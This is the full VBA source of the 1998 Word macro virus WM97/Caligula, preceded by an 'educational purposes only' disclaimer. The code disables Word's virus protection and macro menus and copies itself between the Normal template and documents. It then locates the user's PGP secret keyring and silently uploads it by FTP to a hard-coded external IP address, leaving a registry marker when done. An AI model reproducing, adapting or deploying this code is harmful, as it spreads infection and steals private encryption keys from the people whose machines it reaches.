****************************************************************** DISCLAIMER: This code is for educational purposes only. I wrote this virus to illustrate the weaknesses and flaws in security of Win9x, Office97, and PGP. The author (Opic), his group (CodeBreakers), and their server hold NO, repeat NO responsibilty for others use or misuse of this virus. ie: people that spread it, infected users, etc, etc are ON THEIR OWN. I cannot and will not be help liable for others decisions on what to do with my code. I just make the bullets, if someone shoots at someone else theres little i can do about it. Consider yourself warned. -Opic ****************************************************************** "Virus Attacks: Espionage enabled viruses. Designed to collect/steal information. May be vertically targeted or horizontally deployed. There's a bright future for "espionage enabled" viruses. Consider a virus that spreads only to machines that have a copy of PGP. Countermeasures: Use virus checking software" -Quoted from: Practical Attacks on PGP by Joel McNamara Challenge accepted Joel! may i present: Virus Name: WM97/Caligula Author: Opic [CodeBreakers] Date: 1998 Info: Caligula is a Stealth WM97 SR1(2)-compatible virus. It is unique in the manner that it is one of the first espionage enabled viruses (ie: steals information). Caligula steals PGP Secret Keyrings from infected users and uploads them onto the internet. More specifically it uploads them to: CodeBreakers.Org The virus spreads to users regardless of if they own PGP or not (joel doesnt know much about propagation techniques) but it will only upload the infected users key once (to avoid uploading multiple copies of the key. Caligula places a marker in the Windows registry to signal the PGP theft has been sucessful. on the 31st of the month caligula displays a messagebox which reads: "WM97/Caligula (c)Opic [CodeBreakers 1998] "No cia," "No nsa," "No satellite," "Could map our veins." and the following properties are also given to infected documents: Author: Opic Title: WM97/Caligula Infection Subject: A Study In Espionage Enabled Viruses. Comments: The Best Security Is Knowing The Other Guy Hasn't Got Any. Keywords: | Caligula | Opic | CodeBreakers | *****visit http://WWW.CodeBreakers.org for the latest in VX***** Xtra special thanx go out to: Vic, Lord Natas, and Spo0ky for ALL their help! ******************************************************************* Attribute VB_Name = "Caligula" Sub AutoClose() On Error Resume Next With Dialogs(wdDialogFileSummaryInfo) .Author = "Opic" .Title = "WM97/Caligula Infection" .Subject = "A Study In Espionage Enabled Viruses." .Comments = "The Best Security Is Knowing The Other Guy Hasn't Got Any." .Keywords = " | Caligula | Opic | CodeBreakers | " .Execute End With Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False Application.ScreenUpdating = False Application.DisplayStatusBar = False Application.DisplayAlerts = False CommandBars("tools").Controls("Macro").Enabled = False CommandBars("tools").Controls("Customize...").Enabled = False CommandBars("view").Controls("Toolbars").Enabled = False CommandBars("view").Controls("Status Bar").Enabled = False If NormalTemplate.VBProject.VBComponents.Item("Caligula").Name <> "Caligula" Then NotInNorm = True ActiveDocument.VBProject.VBComponents("Caligula").Export "c:\io.vxd" Set Dobj = NormalTemplate.VBProject ElseIf ActiveDocument.VBProject.VBComponents.Item("Caligula").Name <> "Caligula" Then NotInActiv = True NormalTemplate.VBProject.VBComponents("Caligula").Export "c:\io.vxd" Set Dobj = ActiveDocument.VBProject End If If NotInNorm = True Or NotInActiv = True Then Dobj.VBComponents.Import ("c:\io.vxd") If Day(Now) = 31 Then MsgBox "No cia," & vbCr & "No nsa," & vbCr & "No satellite," & vbCr & "Could map our veins.", 0, "WM97/Caligula (c) Opic [CodeBreakers 1998]" If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Caligula") = False) Then pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command", "") Position = InStr(1, pgppath, "pgpt") If Position <> 0 Then pgppath = Mid(pgppath, 1, Position - 2) Else GoTo noPGP End If With Application.FileSearch .FileName = "\Secring.skr" .LookIn = pgppath .SearchSubFolders = True .MatchTextExactly = True .FileType = msoFileTypeAllFiles .Execute PGP_Sec_Key = .FoundFiles(1) End With Randomize For i = 1 To 4 NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 * Rnd)), 2, 1) Next i NewSecRingFile = "./secring" & NewSecRingFile & ".skr" Open "c:\cdbrk.vxd" For Output As #1 Print #1, "o 209.201.88.110" Print #1, "user anonymous" Print #1, "pass itsme@" Print #1, "cd incoming" Print #1, "binary" Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """" Print #1, "quit" Close #1 Shell "command.com /c ftp.exe -n -s:c:\cdbrk.vxd", vbHide System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Caligula") = True End If noPGP: If NotInActiv = True Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End Sub Sub ToolsMacro() End Sub Sub FileTemplates() End Sub Sub ViewVBCode() End Sub